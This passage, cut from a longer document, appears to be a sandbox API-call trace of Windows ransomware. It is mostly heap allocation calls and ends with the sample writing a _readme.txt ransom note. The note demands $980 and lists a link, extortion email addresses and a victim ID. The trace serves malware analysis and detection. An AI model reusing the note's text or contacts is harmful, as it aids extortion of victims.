lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7b30 | out: hHeap=0x2c0000) returned 1 [0183.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b30 [0183.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7b30 | out: hHeap=0x2c0000) returned 1 [0183.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b30 [0183.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7b30 | out: hHeap=0x2c0000) returned 1 [0183.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b30 [0183.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7b30 | out: hHeap=0x2c0000) returned 1 [0183.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b30 [0183.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.300] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7b30 | out: hHeap=0x2c0000) returned 1 [0183.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b30 [0183.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7b30 | out: hHeap=0x2c0000) returned 1 [0183.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b30 [0183.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.302] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7b30 | out: hHeap=0x2c0000) returned 1 [0183.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b30 [0183.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.303] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7b30 | out: hHeap=0x2c0000) returned 1 [0183.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b30 [0183.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7b30 | out: hHeap=0x2c0000) returned 1 [0183.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b30 [0183.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7b30 | out: hHeap=0x2c0000) returned 1 [0183.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b30 [0183.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7b30 | out: hHeap=0x2c0000) returned 1 [0183.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b30 [0183.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.307] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7b30 | out: hHeap=0x2c0000) returned 1 [0183.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e00 | out: hHeap=0x2c0000) returned 1 [0183.308] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0183.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0183.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ec8 | out: hHeap=0x2c0000) returned 1 [0183.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a68 | out: hHeap=0x2c0000) returned 1 [0183.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e28 | out: hHeap=0x2c0000) returned 1 [0183.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7dd8 | out: hHeap=0x2c0000) returned 1 [0183.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0183.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0183.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7978 | out: hHeap=0x2c0000) returned 1 [0183.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0183.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.310] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0183.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29dcde8 | out: hHeap=0x2c0000) returned 1 [0183.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0183.311] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0183.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.319] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.320] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.321] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.322] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.322] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.323] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.323] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.324] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.324] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.327] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0183.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.334] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.336] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.337] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.338] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.338] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.343] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.344] PathFindFileNameW (pszPath="C:\\Boot\\cs-CZ\\") returned="cs-CZ\\" [0183.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.344] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0183.344] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0183.344] PathFindFileNameW (pszPath="") returned="" [0183.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.344] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0183.344] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0183.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0183.344] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0183.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac3dd0 [0183.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.345] FreeLibrary (hLibModule=0x759a0000) returned 1 [0183.345] PathAppendW (in: pszPath="C:\\Boot\\cs-CZ\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0183.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.345] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.345] PathFileExistsW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 0 [0183.345] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae3ea0 [0183.345] lstrcpyW (in: lpString1=0x2ae3ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0183.345] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write 